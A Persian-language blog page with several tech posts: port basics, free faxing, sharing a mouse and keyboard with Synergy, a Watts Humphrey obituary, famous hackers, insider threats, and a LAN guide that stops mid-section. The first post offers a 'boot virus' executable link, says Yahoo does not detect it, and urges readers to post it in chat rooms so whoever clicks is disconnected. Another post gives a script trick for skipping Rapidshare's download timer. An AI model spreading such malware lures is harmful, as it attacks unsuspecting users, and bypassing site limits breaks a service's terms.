loading...
دنیای آموزش
کاظم نجفی بازدید : 90 چهارشنبه 1390/01/10 نظرات (0)
ويروس بوت!!!

اين ويروس تا وقتی اجرا نشه به کسی صدمه ای نمی زنه پس چون شما می دونيد که اينطوريه اون رو اجرا نميکنيد و ياهو هم اين ويروس رو  نمی شناسه پس به کار مياد چون می تونين برای ديگران پست کنيد.

نکته:اين ويروس هم با برنامه ی  visual basic 6 نوشته شده

.اين آدرس پايين رو کپی بگيرين و توی قسمت آدرس internet explore پست کنيد  nikonam.0catch.com/booter.exe شما میتونید به اول اون  www اضافه کنید ودر چت روم ها یا در صفحه pm تایپ کنید و هر کسی بر روی اون کلیک کرد و فایل را گرفت  بوت بشه.

این برنامه را به هیچ عنوان من ننوشتم

کاظم نجفی بازدید : 136 چهارشنبه 1390/01/10 نظرات (0)
port چیست ؟

در ساده ترين تعريف، محلی است که داده‌ها وارد یا خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند.مثلا پورت 25 برای ارسال ایمیل است ، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال  است   در پایین لیستی از مهمترین پورت ها و کاربردشان را می بینید

   Service          Why it is phun                                  Port Num!
--------   -------         ----------------------------------------
7                        echo            Host repearts what you type
9                                                    discard         Dev/null
11                                  systat           Lots of info on users
13          daytime        Time and date at computers location
15                    netstat          Tremendous info on networks
19      chargen        Pours out a stream of ASCII characters.
21                                          ftp                Transfers files
23                                      telnet           Where you log in.
25                                             smpt             Forge email
37                                                       time              Time
39                                     rlp                Resource location
43                        whois           Info on hosts and networks
53                                              domain         Nameserver
70                              gopher         Out-of-date info hunter
79                                  finger           Lots of info on users
80                                               http              Web server
110                                        pop              Incoming email
119 nntp             Usenet news groups - forge posts, cancels
443                                  shttp            Another web server
512                                       biff               Mail notification
513                                           rlogin           Remote login
           who             Remote who and uptime
514         shell           Remote command, no password used!
           syslog          Remote system logging
520                     route           Routing information protocol


از میان این پورت ها شماره های 7 ، 15 ، 21 ، 23 ، 25 ، 79 ،80 ، 110 و 119 فعلا برای ما مهم ترند

کاظم نجفی بازدید : 280 چهارشنبه 1390/01/10 نظرات (0)
ارسال فکس رایگان به آمریکا و کانادا از طریق اینترنت

یکی از مشکلاتی که برای ایرانیان داخل کشور وجود دارد ارسال فکس به خارج از کشور است. این موضوع به دلیل هزینه سنگینی که برای فرد ارسال کننده دارد اصلأ به صرفه نیست و مراکز مخصوص اینکار نیز جهت ارسال فکس به خارج از کشور نیز برای ارسال هر صفحه فکس هزینه زیادی طلب میکنند. اما اگر قصد ارسال فکس به دو کشور آمریکا و کانادا را دارید دیگر نگران نباشید! چرا که هم اکنون میتوانید از طریق اینترنت به صورت کاملأ رایگان برای گیرنده در این دو کشور فکس ارسال کنید. به طوریکه به وسیله ابزاری آنلاین تنها با ضمیمه نمودن فایل متنی و یا تایپ یک متن خاص میتوانید به رایگان فکس ارسال نمایید.


بدین منظور:
کافی است به سایت www.faxzero.com مراجعه نمایید.
اکنون در Sender Information، اطلاعات خود را وارد کنید. تنها وارد نمودن نام (Name) و ایمیل (Email) کفایت میکند.
در قسمت Receiver Information نیز بایستی اطلاعات دریافت کننده فکس در آمریکا یا کانادا را درج نمایید. نام (Name) و شماره فکس (# Fax) ضروری است.
در هنگام وارد نمودن شماره فکس بایستی تنها پیش شماره و شماره فکس را وارد نمایید، به طوریکه مجموعأ 10 رقم وارد شده باشد.
در بخش Fax Information نیز میتوانید فایل doc ،pdf و یا xls خود را جهت ضمیمه شدن آپلود نمایید. یا متن خود را در همان قسمت تایپ نمایید.
در نهایت کد داخل عکس را در Confirmation Code وارد نموده و بر روی دکمه Send Free Fax Now کلیک کنید تا فکس شما ارسال گردد.

تنها لازم به ذکر است سرویس رایگان این ابزار آنلاین با محدودیت هایی نیز روبرو است؛
بر روی هر صفحه فکس ارسالی تبلیغاتی درج میگردد. در هر بار ارسال فکس تنها میتوان 1 فایل را ضمیمه نمود آن هم نهایتأ با 3 صفحه و در آخر اینکه در طول روز میتوان 2 فکس به شکل رایگان ارسال نمود که البته این محدودیتها چندان نیز دست و پا گیر نیستند.

کاظم نجفی بازدید : 221 چهارشنبه 1390/01/10 نظرات (0)

صفر کردن تایمر Rapidshare با یک ترفند ساده


یکی از مشکلاتی که گریبانگیر اکثر کاربران اینترنت است ، دانلود فایل های آپلود شده در Rapidshare است. سایت Rapidshare.com را میتوان بزرگترین آپلود سنتر و محل اشتراک فایلها دانست. اما محدودیت های متعددی که در سرویس رایگان این سایت وجود دارد ، دانلود فایلها توسط کاربران را بسیار آزار دهنده کرده است. عدم استفاده از دانلود منیجر ، محدودیت های زمانی دانلود ، تایمر طولانی مدت و معطلی کاربران و... از محدودیت های موجود در سرویس رایگان راپیدشیر هستند که راه حل آنها نیز خرید اکانت پولی از راپیدشیر است. اما هم اکنون قصد داریم ترفندی را معرفی کنیم که با بهره گیری از آن میتوانید از شر یکی از این محدودیت ها خلاص شوید! با استفاده از این ترفند میتوانید تایمری که زمان زیادی از شما را هنگام دانلود میگرد را با یک عمل ساده در مرورگر صفر کنید و به مرحله بعدی دانلود بروید!

بدین منظور:
پس از ورود به صفحه مربوط به دانلود فایل در راپیدشیر روی دکمه Free کلیک کنید.
خواهید دید که در این صفحه تایمر شروع به کار میکند.
حال برای رفتن به مرحله بعدی دانلود و رد این مرحله بدون معطلی ، کد زیر را با دقت در قسمت Adrress Bar مرورگر خود وارد نمایید:

javascript:alert(c=1)                        s

اکنون دکمه Enter را بزنید. خواهید دید که پیغامی با محتوای 1 ، برای شما نمایان میشود.
آن را OK کنید. خواهید دید که بلافاصله به آخرین مرحله دانلود فایل خواهید رفت.

کاظم نجفی بازدید : 216 چهارشنبه 1390/01/10 نظرات (0)

به اشتراک گذاری ماوس و کیبورد در میان کامپیوترهای تحت شبکه


اگر با شبکه های کامپیوتری آشنایی داشته باشید حتمأ میدانید که یکی از کاربردهای آن به اشتراک گذاری فایلها و فولدرها در میان کامپیوترهای تحت شبکه است. اما آیا تاکنون به این موضوع فکر کرده اید که میتوان ماوس و کیبورد را هم در میان کامپیوترهای موجود در شبکه به اشتراک گذاشت؟ باید بدانید که اینکار به سادگی امکان پذیر است. با استفاده از این ترفند شما میتوانید ماوس یا کیبورد خود را بین چندین کامپیوتر و آن هم با سیستم عاملهای مختلف به اشتراک بگذارید، بدون نیاز به هیچگونه سخت افزار جانبی برای اینکار! به طوریکه هر سیستم تنها نیاز به یک مانیتور دارد و با انجام عملیات توسط کیبورد یا ماوس توسط شما در یک سیستم، امکان انجام آن در سایر سیستم های شبکه نیز به شکل همزمان مهیا است. هم اکنون به معرفی این ترفند کاربردی به کمک یک ابزار جانبی کم حجم و متن باز میپردازیم.

برای اینکار:
شما نیازمند برنامه ای کم حجم، رایگان و متن باز به نام Synergy هستید.
به وسیله Synergy میتوانید کلیه موارد یاد شده در بالا را در سیستم عاملهای ویندوز، مک و یونیکس صورت دهید.
کلیه سیستم ها نیز بایستی TCP/IP را پشتیبانی کنند.
برای دانلود آخرین نسخه Synergy به نشانی http://synergy2.sourceforge.net مراجعه کنید.
سپس از قسمت Download > Latest Release میتوانید آخرین نسخه این برنامه را دانلود نمایید.
همانطور که ذکر شد این برنامه Open Source نیز هست و شما میتوانید سورس نرم افزاری آن را نیز جداگانه دریافت کنید و در صورت نیاز استفاده کنید.
پس از دانلود فایل کافی است برنامه را نصب نمایید.
سپس آن را اجرا کرده و به سادگی در محیط برنامه نام کامپیوتری که قصد به اشتراک گذاری موس و کیبورد با آن را دارید را وارد نموده و دکمه Start را بزنید تا عملیات به اشتراک گذاری انجام پذیرد.

کاظم نجفی بازدید : 304 چهارشنبه 1390/01/10 نظرات (0)

واتس هامفری (Watts Humphrey) در ۲۸ اکتبر ۲۰۱۰ چشم از جهان فرو بست. وی  که متولد سال ۱۹۲۷ بود، یکی از متفکران صاحب‌سبک در مهندسی نرم‌افزار است که پدر کیفیت نرم‌افزار نیز خوانده می‌شود.

واتس هامفری یکی از چهره‌های مهندسی نرم افزار در کنار بزرگانی چون بری بوهم، فرد بروکس و ویک باسیلی از معدود کسانی است که به تعریف این حوزه جدید کمک کرده‌اند.  هامفری مهندسی را به مهندسی نرم افزار آورد. کارهای وی در ترغیب جامعه نرم افزاری به توجه و تأکید بر کیفیت، اندازه‌گیری و عملکرد تأثیر بی‌اندازه‌ای بر این جامعه داشت.

وی دارای مدرک کارشناسی و کارشناسی ارشد فیزیک و کارشناسی ارشد مدیریت اجرایی بود. در دهه هفتاد وی ریاست گروهی را در IBM به عهده داشت که برای اولین بار مجوز نرم‌افزار (Software License) را معرفی کردند. وی مدیر برنامه‌نویسی و نایب رییس توسعه فنی در IBM‌ بود.

در سال ۱۹۸۶ پس از سه دهه از IBM به مؤسسه مهندسی نرم‌افزار دانشگاه کارنگی ملون یا SEI آمد و برنامه فرایند نرم‌افزار را پایه‌گذاری کرد. وی رهبری توسعه مدل بلوغ قابلیت نرم‌افزار (Software Capability Maturity Model) را به عهده داشت و روش‌های ارزیابی فرایند نرم‌افزار (Software Process Assessment) و ارزشیابی قابلیت نرم‌افزار (Software Capability Evaluation) را مطرح و ارائه کرد. بعدها، این کارها مبنایی برای توسعه  CMMI یا Capability Maturity Model Integration شدند.

از دیگر کارهای وی می‌توان به ارائه فرایند نرم‌افزار تیمی یا (Team Software Process) و فرایند نرم‌افزار شخصی یا (Personal Software Process) اشاره کرد. TSP چارچوب فرایند عملیاتی مشخصی را برای کمک به گروه‌‌های متشکل از مدیران و مهندسان که وظیفه سازماندهی و انجام پروژه‌های نرم‌افزاری بزرگ را به عهده دارند، ارائه می‌کند. PSP نیز فرایندی ساخت‌ یافته‌ای برای توسعه نرم‌افزار است که به مهندس نرم‌افزار کمک می‌کند تا به شناخت و بهبود عملکرد خود با به‌کارگیری رویه‌های نظام‌مند و داده‌محور اقدام کند.

وی در سال ۲۰۰۳ مؤفق به دریافت نشان ملی فناوری شد که توسط رییس جمهور وقت آمریکا، جورج دبلیو بوش، به وی تقدیم شد.

مرجع : + و +
منبع : سماموس

کاظم نجفی بازدید : 115 چهارشنبه 1390/01/10 نظرات (0)
مشهورترین هکرهای جهان کیستند؟

فرد نفوذی به داخل سیستم نامه های الکترونیکی پایگاه مطالعاتی آب و هوا در انگلستان، نامه ها و مدارکی را از این پایگاه بر روی اینترنت منتشر کرده که نشان می دهد دانشمندان با پیچیده کردن اطلاعات و فریب مردم قصد باوراندن تئوری گرمای جهانی را دارند اما دانشمندان اعلام کرده اند متن این نامه ها تغییر پیدا کرده و تنها نشان می دهند که دانشمندان در حال گفتگوهای بی پرده و صریح در رابطه با بحران گرمای جهانی بوده اند.

در ادامه لیستی از مشهورترین هکرهای جهان که هر یک خسارات قابل توجهی را به شرکتهای مختلف وارد آورده اند و در نشریه تلگراف منتشر شده است، ارائه می شود.

کوین میتنیک: شاید یکی از مشهورترین هکرهای جهان در نسل خود کوین میتنیک باشد. وزارت دادگستری ایالات متحده آمریکا از این فرد به عنوان "بزرگترین مجرم رایانه ای در تاریخ آمریکا" یاد می کند. وی با نام مستعار Hacker Poster Boy به سیستم رایانه ای برخی از مهمترین شرکتهای فناوری و ارتباطاتی از قبیل نوکیا، فوجیتسو و موتورولا نفوذ کرد. وی سرانجام در سال 1995 توسط FBI بازداشت شده و با اعتراف به چندین اتهام وارد شده به پنج سال زندان محکوم شد. پس از آزادی در سال 2000 میتنیک اکنون ریاست شرکت مشاور ایمنی رایانه ای را به عهده داشته و از تکنیکهای هک به عنوان مهندسی اجتماعی یاد می کند.

کوین پولسن: نفوذ به خطوط تلفنی ایستگاه رادیویی لس آنجلس به منظور برنده شدن در رقابت تلفنی که ایستگاه رادیویی در حال اجرای آن بود، اولین رسوایی فعالیتهای هکری پولسن به شمار می رود. وی با نام مستعار "دانته تاریک" جرائم رایانه ای دیگری از قبیل هک کردن پایگاه داده های تجسسهای فدرال را مرتکب شده و پس از آن دستگیر شد. وی پس از آزادی حرفه روزنامه نگاری را در پیش گرفته است.

آدرین لامو: لامو به دلیل استفاده از کافی شاپها، کتابخانه ها و کافی نت ها برای فعالیتهای خود به "هکر بی خانمان" شهرت یافته بود. بیشتر فعالیتهای وی در نفوذ به شبکه های رایانه ای شرکتهای مختلف و گزارش نقص و نقطه ضعف این شبکه ها به شرکتهای مالک شبکه ها بود. یکی از بزرگترین ادعاهای لامو نفوذ به شبکه نیویورک تایمز و افزودن نام خود به پایگاه داده های متخصصان این پایگاه بوده است. لامو نیز اکنون یک روزنامه نگار است.

استفن وزنیاک: وی به دلیل اینکه یکی از بنیانگذران شرکت اپل به شمار می رود از شهرت بالایی برخوردار است، وی فعالیتهای خود را در زمینه هک با نفوذ به تلفنهای همراه آغاز کرد. به گزارش مهر، وی در حالی که در دانشگاه کالیفرنیا مشغول به تحصیل بود برای همکلاسی های خود ابزاری به نام جعبه آبی ساخت که به آنها امکان مکالمات راه دور طولانی مدت را به صورت رایگان می داد. وزنیاک با آغاز پروژه ساخت یک رایانه از ادامه تحصیل صرف نظر کرده و به همراه دوست خود استیو جابز رایانه اپل را ابداع کردند.

لوید بلنکن شیپ: لوید بلنکن شیپ با نام مستعار "مرشد" از اعضای چندین گروه از هکرها در دهه 1980 بوده است. از بزرگترین عوامل به شهرت رسیدن وی نوشتن کتابی به نام "بیانیه هکر" یا "باطن یک هکر" بوده است که پس از دستگیری اش در سال 1986 نگاشته شده است. در این کتاب تنها جرم هکرها کنجکاوی ذکر شده است.

مایکل کالک: مایکل کالک در سن 15 سالگی با هک کردن تعدادی از مشهورترین وب سایتهای اقتصادی جهان شناسایی شد. کالک در سال 2000 با نام مستعار "پسر مافیایی" به 75 رایانه در 52 شبکه مختلف حمله کرد که این حمله سایتهایی مانند eBa، آمازون و یاهو را تحت تاثیر قرار داد. وی پس از مکالمه آن لاینی درباره جرمی که مرتکب شده دستگیر شده و به هشت ماه حبس باز، یک سال مجازات حبس تعلیقی، محدودیت در استفاده از اینترنت و پرداخت خسارت نقدی محکوم شد.

رابرت تاپان موریس: رابرت تاپان موریس در نوامبر 1988 یک ویروس رایانه ای از دانشگاه کرنل در حدود 6 هزار رایانه را از کار انداخته و میلیونها دلار خسارت به بار آورد. خالق این ویروس رابرت تاپان موریس اولین فردی است که به جرم تخلف رایانه ای و سو استفاده از آن محکوم به مجازات شد.

وی اعلام کرد ویروس گسترده شده با هدف آسیب رساندن به اینترنت نبوده و تنها با هدف سنجیدن وسعت اینترنت وارد این شبکه شده است. با این حال این ادعاها کمکی به وی نکرده و وی به سه سال حبس تعلیقی، چهار هزار ساعت خدمات اجتماعی و پرداخت خسارت نقدی سنگینی شد. نمونه سی دی حاوی این ویروس مخرب هم اکنون در موزه علوم بوستون در معرض دید قرار دارد.

The Master of Deception: این گروه از هکرها در اواسط دهه 80 سیستم خطوط تلفن آمریکا را مورد هدف قرار دادند و به سیستم رایانه های AT&T نفوذ کردند. این گروه به تدریج و با دستگیر شدن اعضای آن در سال 1992 غیر فعال شد.

دیوید اسمیت: وی خالق ویروس ملیسا اولین ویروس رایانه ای که از طریق اینترنت انتقال پیدا می کند بوده است. اسمیت مدت کوتاهی پس از گسترش این ویروس دستگیر شده و به دلیل به بار آوردن خسارتی در حدود 80 میلیون دلار محکوم به زندان شد.

استیو جاشان: وی به دلیل نوشتن ویروسهای Netsky و Sasser در سال 2004 و در حالی که دوره نوجوانی خود را سپری می کرد، متهم شناخته شد. این ویروس ها مسئول گسترش 70 درصد از نرم افزارهای مخرب یا Malware ها در اینترنت به شمار می رفتند. وی اکنون به استخدام یک شرکت ایمنی رایانه ای درآمده است.
کاظم نجفی بازدید : 132 چهارشنبه 1390/01/10 نظرات (0)
محافظت از شبكه در مقابل خرابكاران داخلي

مؤسسات IT، براي محافظت از شبكه در برابر عوامل نفوذ خارجي، زمان، پول و تلا‌ش زيادي را صرف مي‌كنند. اما غالبا كاربران مجاز داخلي كه در شبكه تصميم به "خرابكاري" مي‌گيرند، ناديده گرفته مي‌شوند. آن‌ها تصميم مي‌گيرند براي رسيدن به اهداف خود شبكه را دستكاري كنند. 


همان‌طور كه خرده‌فروشان به اين نتيجه رسيده‌اند كه اغلب دزدي‌ها به‌دست افراد داخلي اتفاق مي‌افتد تا خريداران خارجي، برخي از شركت‌ها هم از اين‌كه مي‌بينند كاربران داخلي به اندازه هكرهاي اينترنتي براي شبكه خطرناكند، متعجب مي‌شوند.

بعضي مواقع اين كار غيرعمدي است. كاربران عادي از روي اشتباه به مشاهده سايتي مي‌پردازند كه كدهاي مخرب را اجرا مي‌كند، برنامه‌اي را دانلود مي‌نمايد كه فكر مي‌كنند براي كارشان مفيد است. ولي در اصل برنامه حاوي جاوس‌افزار است. روي ايميلي كليك مي‌كنند كه حاوي ضميمه آلوده به ويروس بوده است و بالا‌خره لپ‌تاپ خود را كه حاوي نرم‌افزاري مخرب است و خودشان هم از آن خبر ندارند به شبكه متصل مي‌نمايند و به اين صورت كد مخرب را وارد شبكه مي‌كنند.

آنان مطلع نيستند كه كارهاي آن‌ها سياست‌هاي كاري و امنيت شبكه را نقض مي‌كند. يا اين‌كه كاربر مي‌داند كه فعاليت‌هاي او سياست‌هاي شبكه را نقض مي‌كند و دانش خوبي هم در اين زمينه دارد. ولي گمان نمي‌كند اين عمل به معني از كار انداختن شبكه است. آن‌ها نادانسته سازوكارهاي امنيتي شبكه را نقص مي‌كنند؛ چون به نظرشان اين سازوكارها دست‌وپاگير هستند. اما در هر حال انجام دادن اين كارها مي‌تواند به شبكه شركت صدمه بزند.

خرابكاران چه مي‌كنند؟

كاربران مخرب به‌طور عمدي قوانين را زير پا مي‌گذار‌ند. آن‌ها معتقدند اين قوانين فقط خاص كساني است كه اطلا‌عات تخصصي كافي ندارند. يك كاربر مخرب ممكن است كارهاي زير را انجام دهد:

- بدون اجازه بخش IT، يك Access Point بي‌سيم را وارد شبكه نمايد. سپس كامپيوتر همراه خود را وارد شبكه كند و از اينترنت استفاده ‌نمايد.

‌‌‌‌- آنتي‌ويروس شركت را به دليل اين كه موجب كند شدن سيستمش مي‌شود، بدون اجازه غيرفعال ‌نمايد.

‌- از نام كاربري و رمز عبور، كاربر ديگري استفاده ‌كند. ممكن است اين اطلا‌عات را از طريق crack ‌كردن يا مهندسي اجتماعي به دست آورده باشد. با اين كار به فايل‌ها و اطلا‌عاتي كه اجازه ندارد به آن‌ها دسترسي داشته باشد، دست ‌يابد.

‌- با استفاده از يك ابزار هكري، سطح دسترسي خود را در شبكه بالا‌ مي‌برد. بنابراين مي‌تواند به نصب نرم‌افزار بپردازد، يا كارهايي را انجام دهد كه اجازه انجام دادن آن‌ها را ندارد.

- بازي و يا ساير نرم‌افزارهاي مفيد را بدون اجازه نصب كند.

‌- اطلا‌عات غيرمجاز موجود در فلا‌پي‌ديسك، سي‌دي يا حافظه‌هاي همراه را وارد شبكه نمايد.

- داده‌هاي شركت را وارد يك حافظه قابل حمل كند و از شركت خارج نمايد.

وجود يك كاربر مخرب، مشكلي پرسنلي است. اما خرابكاري‌هايي كه او انجام مي‌دهد، موجب ايجاد اشكالا‌ت تكنيكي در شبكه مي‌شود. بدتر از همه زماني است كه اين خرابكار، رئيس شركت شما باشد. در اين صورت بايد با استفاده از راه‌حل‌هاي فناوري به مقابله با اين‌گونه خطرها بپردازيد.

چرا كاربران مخرب خطرناكند؟

يك كاربر مخرب چه ضررهايي را مي‌تواند به شبكه بزند؟ بسيار زياد! قرار دادن يك نقطه AP بي‌سيم در شبكه و در پشت فايروال، درهاي شبكه شما را براي جويندگان شبكه بي‌سيم (wardrivers) و ساير افراد خارجي باز‌مي‌كند. غيرفعال‌كردن آنتي‌ويروس موجب مي‌شود، بدافزارهايي كه فكر مي‌كنيد اصلا‌ً وارد نشوند، به راحتي به درون شبكه نفوذ كنند. استفاده از حساب كاربري شخص ديگر باعث مي‌شود نتوانيد شخص خاطي را به راحتي پيدا كنيد. حتي ممكن است افراد بي‌گناه مورد سرزنش قرار بگيرند. استفاده از اجازه دسترسي بالا‌تر از حد مجاز، سطحي از آسيب‌پذيري را ايجاد مي‌كند كه هكرها به راحتي مي‌توانند از آن سوء‌استفاده كنند. نصب نرم‌افزارهاي غيرمجاز، ورود جاسوس‌افزار، ويروس و ساير نرم‌افزارهاي مخرب به شبكه را آسان مي‌كند. خارج كردن اطلا‌عات مهم از شركت نيز مي‌تواند نوعي دزدي اطلا‌عات باشد كه برخلا‌ف قانون است.

دنبال كردن يك كاربر غيرمجاز

اولين قدم آن است كه بدانيم، كاربر غيرمجاز چه كاري انجام مي‌دهد. اين‌كار به معناي مانيتور‌كردن فعاليت‌هاي كاربر است. شما مي‌توانيد APهاي غيرمجاز را با نرم‌افزارهاي خاص اين كار

مانند Net Stumbler پيدا كنيد. اين نرم‌افزار رايگان است و نسخه‌هاي مختلفي ازآن براي لپ‌تاپ‌ها وPocket PC ها وجود دارد. همچنين مي‌توانيد از كارت‌هاي GPS براي تهيه نقشه‌اي از محدوده APهاي غيرمجاز استفاده كنيد. مي‌توانيد موقعيت‌ياب‌هاي شبكه بي‌سيم مانند WiFi ‌ياب Kensington را نيز خريداري كنيد.

اسكنري مانند GFI Languard مي‌تواند آسيب‌پذيري سيستم، سرويس‌ها و برنامه‌هاي كاربردي مانند آنتي‌ويروس‌ها و برنامه‌هاي غيرمجاز را تشخيص دهد و بروزبودن دستگاه‌ها با آخرين سرويس‌پك‌ها و وصله‌هاي امنيتي را نيز بررسي ‌كند. اين برنامه از قابليت تشخيص آسيب‌پذيري‌هاي امنيتي كه كاربر با تغيير رجيستري به‌وجود ميآورد، نيز برخوردار است.

شما مي‌توانيد استفاده غيرمجاز كاربران از حساب كاربري و اسم رمز كارمندان ديگر را از طريق فعال‌كردن audit توكار ويندوز و مانيتوركردن استفاده از كامپيوتر تشخيص دهيد و دسترسي به فايل‌ها و فولدرها را نيز كنترل كنيد.

راه ديگر، استفاده از برنامه‌هاي packet sniffer يا protocol analyzer است كه نشان مي‌دهد پكت‌ها از كجا مي‌آيند و به كجا مي‌روند. براي نمونه هم مي‌توانيد از برنامه sniffer pro و Ethereal استفاده نماييد.

فايل‌هاي Log فايروال مي‌تواند اطلا‌عات دقيقي از عادات گشت‌وگذار كاربران را به شما ارائه دهد: اين‌كه آيا آن‌ها به سايت‌هاي خطرناك وارد مي‌شوند؟ از اينترنت فايل دانلود مي‌كنند؟

از نرم‌افزارهاي به اشتراك‌گذاري فايل (P2P) استفاده مي‌كنند يا اين‌كه به تبادل اطلا‌عات از طريق پيام‌رسان فوري مي‌پردازند، اطلا‌عاتي است كه شما حتماً بايد از آن‌ها آگاه باشيد.

مي‌توانيد از نرم‌افزار و يا سخت‌افزارهاي مخصوص ثبت كليدهاي استفاده‌شده كاربر(Keylogger) هم استفاده كنيد. با اين كار مي‌توانيد از هر چيزي كه او تايپ مي‌كند، آگاه شويد. نرم‌افزار Activity Monitor 3.8 از شركت Soft Activity مي‌تواند اين كار را انجام دهد. اين نرم‌افزار مي‌تواند نرم‌افزارهاي اجرا شده را نيز گزارش دهد.

محافظت در مقابل خرابكاران

هميشه پيشگيري بهتر از درمان است. در ادامه چند پيشنهاد براي پيشگيري از فعاليت مخرب كاربر ارائه شده است:

- فراهم كردن يك شبكه بي‌سيم تحت كنترل را در نظر داشته باشيد. اغلب‌اوقات دليلي كه كاربران، يك شبكه غيرمجاز را راه‌اندازي مي‌كنند، اين است كه هيچ شبكه بي‌سيمي براي ارتباط آن‌ها موجود نيست. به همين دليل شركت‌هايي كه شبكه بي‌سيم ندارند، آسيب‌پذيرتر از شركت‌هايي هستند كه اين نوع شبكه را راه‌اندازي ‌كرده‌اند. براي همين شما هم مي‌توانيد يك شبكه بي‌سيم براي دسترسي به اينترنت راه‌اندازي كنيد. ولي براي دسترسي به شبكه داخلي حتماً بايد از VPN استفاده كنيد. همچنين مي‌توانيد با مواردي چون رمزگذاري درAPها، فيلتركردن آدرس‌هاي MAC، خاموش كردن SSID Broadcasting و عوض‌كردن مشخصات كارخانه‌اي دستگاه‌ها، كه كاربران عادي به آن توجهي ندارند، امنيت شبكه بي‌سيم خود را بالا‌ ببريد.

- اگر به هر حال كاربران يك AP غيرمجاز را راه‌اندازي كردند، از IPSEC استفاده كنيد تا ارتباط ميان كلا‌ينت‌ها و سرورهاي حياتي، رمزگذاري شده باشد. اين كار حداقل ترافيك عبوري را محافظت مي‌كند.

- استفاده از راه‌حل‌هاي نرم‌افزاري مانند Airwave براي آگاه شدن از ورود و محل يكAP غيرمجاز به شبكه مفيد است.

- استفاده از ديسك‌هاي فلا‌پي را با خارج كردن درايوهاي فلا‌پي از كامپيوترها محدود كنيد. پورت‌هاي USB را غيرفعال نماييد. از نرم‌افزارهاي خاص براي كنترل استفاده از حافظه‌هاي قابل حمل استفاده كنيد. آسيب‌پذيري سيستم‌هاي خود را طبق برنامه‌اي منظم كنترل نماييد و از حضور نرم‌افزارهايي كه ريسك امنيتي بالا‌يي دارند آگاه شويد. بالاخره اين كه ا‌ز روش‌هاي پيشرفته‌تر تشخيص كاربران (كارت‌هاي هوشمند يا بيومتريك) استفاده كنيد. بدين‌وسيله دسترسي غيرمجاز به شبكه، از طريق رمز فرد ديگر را غيرممكن مي‌كنيد.

کاظم نجفی بازدید : 192 چهارشنبه 1390/01/10 نظرات (0)

آموزش راه اندازی و تنظیم یک شبکه LAN کوچک

اگر در محیط کار یا منزل خود با بیش از یک کامپیوتر سروکار دارید احتمالا به فکر افتاده اید که آنها را به یکدیگر متصل کرده و یک شبکه کوچک کامپیوتری راه بیا ندازید .

با اتصال کامپیوتر ها به یکدیگرمیتوانید چاپگرتان را بین همه انها به اشتراک بگذارید از طریق یکی از کامپیوتر ها که به اینترنت وصل است بقیه را نیز به اینترنت متصل کنید از هر یک از کامپیوتر ها به فایل های خود از جمله عکس ها اهنگ ها و اسنادتان دسترسی پیدا کنید به بازی هایی بپردازید که نه چند بازیکن با چند کامپیوتر نیاز دارند
وبلاخره این که که خروجی وسایلی چون DVD PLAYER یا وب کم را به سایر کامپیوتر ها ارسال کنید .

در این مقاله صمن معرفی روش های مختلف اتصال کامپیوتر ها به یکدیگر انخام تنضیمات دستی را برای بهره بردن از حد اقل مزایای یک شبکه کامپیو تری به شما نشان می دهیم .

ذکر این نکته هم لازم است که قسمت اصلی این مقاله به نصب نرم افزار اختصاص دارد اما در انتهای مطلب در خصوص ساختار شبکه و مسائل فیزیکی ان هم توضیحاتی داده ایم .



روشهای اتصال:
برای اثصال کامپیوتر هایی که در فاصله ای نه چندان دور از یکدیگر قرار دارند راههای مختلفی وجود دارد که عبارتند از :
سیم کشی دیتا به صورت تو کار در حین ساخت ساختمان که امروز بسیار متداول است .
ذر این روش همان گونه که برای برق ساختمان از قبل نقشه می کشند و مثلا جای کلید ها و پریز ها را مشخص می کنند برای شبکه کامپیوتری هم نقشه کشی و سیم کشی می کنند .
قرار دادن سیم ها در کف اتاق و اتصال کامپیوتر هایی که در یک اتاق قرار دارند .
استفاده از فناوری بی سیم
ساتفاده از سیم کشی برق داخل ساختمان
استفاده از سیم کشی تلفن داخل ساختمان

هر یک روش ها مزایا و معایب خاص خود را دارند اما برای به اشتراک گذاشتن چاپگر فایل ها و اینتر نت باید کامپیوتر ها را به نحو صحیح و مناسبی تنظیم و آماده کنید و فرق نمی کند که کدام روش را انتخاب کرده باشید
به همین دلیل کار را از همین نقطه شروع می کنیم از آنجا که ویندوز های اکس پی و ۹۸ پر استفاده ترین ویندوز ها در منازل و دفاتر کوچک هستند نحوه اشتراک گذاری منابع در این دو ویندوز را مورد بحث قرار می دهیم هر چند مورد سایر ویندوز ها مفاهیم تغییر نمی کند
گام های اولیه :
برای راه اندازی شبکه در منزل خود این سه کار را باید انجام دهیم :
۱انتخاب فناوری مناسب شبکه که مورد نظر ما در این مقاله اترنت استاندارد است
۲خرید و نصب سخت افزار مناسب این کار، که اصلی ترین آنها کارت شبکه برای هر یک از این کامپیوتر ها و یک هاب – سوییچ است
۳تنظیم و آماده سازی سیستم ها به نحوی که بتوانند همدیگر را ببینند و با یکدیگر صحبت کنند

از این سه مرخله قدم سوم از همه مهم تر است .
ویندوز اکس پی قسمتی به نام NETWORK SETUP WIZARD دارد که تنظیمات شبکه را برای شما انجام می دهد .
به غیر از این متخصصان هستند که در ازای دریافت دستمزد ، شبکه شما را در محل راه می اندازند .
نام گذاری کامپیوتر ها به اشتراک گذاشتن چاپگر ها فایل ها و اتصالات اینترنتی ،اساسی ترین کارهایی هستند که این افراد برای شما انجام می دهند .
اما اگر با مشکلی مواجه بشوید یا تنظیمات کامپیوتر تان بهم بخورد ، باید بتوانید خودتان شبکه را تنظیم کنید .
کلا بد نیست مفاهیم و اصول راه اندازی یک شبکه کامپیوتری را بدانید تا به هنگام ضرورت خودتان بتوانید دست به کار شوید .
به طور کلی کار هایی که باید انجام دهید تا یک شبکه (( مرده)) را ((زنده)) کنید و به بهره برداری از ان بپر دازید ، از این قرار است :
نام گذاری کامپیوتر
دادن آدرس IP
به اشتراک گذاشتن فایل ها
به اشتراک گذاشتن چاپگر
انجام تنظیمات امنیتی
به اشتراک گذاشتن اتصال اینترنت

نام گذاری کامپیوتر:
